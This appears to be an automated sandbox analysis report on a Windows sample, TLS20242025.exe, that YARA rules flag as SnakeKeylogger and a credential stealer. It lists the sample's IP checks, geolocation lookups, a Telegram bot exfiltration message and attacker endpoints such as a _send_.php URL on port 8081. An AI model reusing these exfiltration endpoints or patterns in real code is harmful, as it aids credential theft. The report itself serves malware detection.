Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 13:19:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: TLS20242025.exe, 00000002.00000002.4583576880.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20a
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002C98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enP
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\TLS20242025.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105C147	2_2_0105C147
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105A088	2_2_0105A088
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_01055362	2_2_01055362
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105D278	2_2_0105D278
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105C46A	2_2_0105C46A
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105C738	2_2_0105C738
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105E988	2_2_0105E988
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_010569A0	2_2_010569A0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105CA08	2_2_0105CA08
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105CCD8	2_2_0105CCD8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105CFAA	2_2_0105CFAA
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_01056FC8	2_2_01056FC8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_01053E09	2_2_01053E09
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105F974	2_2_0105F974
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_0105E97A	2_2_0105E97A
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_010529E0	2_2_010529E0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D1E80	2_2_067D1E80
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D17A0	2_2_067D17A0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DFC68	2_2_067DFC68
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D9C18	2_2_067D9C18
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D9548	2_2_067D9548
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DE258	2_2_067DE258
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D0B30	2_2_067D0B30
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D5028	2_2_067D5028
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D2968	2_2_067D2968
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D1E70	2_2_067D1E70
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DDE00	2_2_067DDE00
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DE6B0	2_2_067DE6B0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DE6AF	2_2_067DE6AF
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DE6A0	2_2_067DE6A0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DEF60	2_2_067DEF60
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D178F	2_2_067D178F
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DCCA0	2_2_067DCCA0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DCC8F	2_2_067DCC8F
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DD550	2_2_067DD550
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DD540	2_2_067DD540
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DDDFF	2_2_067DDDFF
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DDDF1	2_2_067DDDF1
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DE24B	2_2_067DE24B
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DEAF8	2_2_067DEAF8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D0B20	2_2_067D0B20
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DEB08	2_2_067DEB08
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DF3B8	2_2_067DF3B8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DF3A8	2_2_067DF3A8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D8BA0	2_2_067D8BA0
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D0040	2_2_067D0040
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D003F	2_2_067D003F
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D5027	2_2_067D5027
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DF810	2_2_067DF810
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D0007	2_2_067D0007
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DF803	2_2_067DF803
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DD0F8	2_2_067DD0F8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067D295F	2_2_067D295F
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DD9A8	2_2_067DD9A8
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DD9A7	2_2_067DD9A7
Source: C:\Users\user\Desktop\TLS20242025.exe	Code function: 2_2_067DD999	2_2_067DD999

Source: TLS20242025.exe, 00000000.00000000.2128299617.0000000000532000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePvI.exe( vs TLS20242025.exe
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs TLS20242025.exe
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe
Source: TLS20242025.exe, 00000000.00000002.4583281992.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs TLS20242025.exe
Source: TLS20242025.exe, 00000000.00000002.4587810220.0000000005200000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs TLS20242025.exe
Source: TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs TLS20242025.exe
Source: TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe
Source: TLS20242025.exe, 00000000.00000002.4587170944.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs TLS20242025.exe
Source: TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe
Source: TLS20242025.exe, 00000002.00000002.4583338825.00000000009A7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TLS20242025.exe
Source: TLS20242025.exe	Binary or memory string: OriginalFilenamePvI.exe( vs TLS20242025.exe

Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
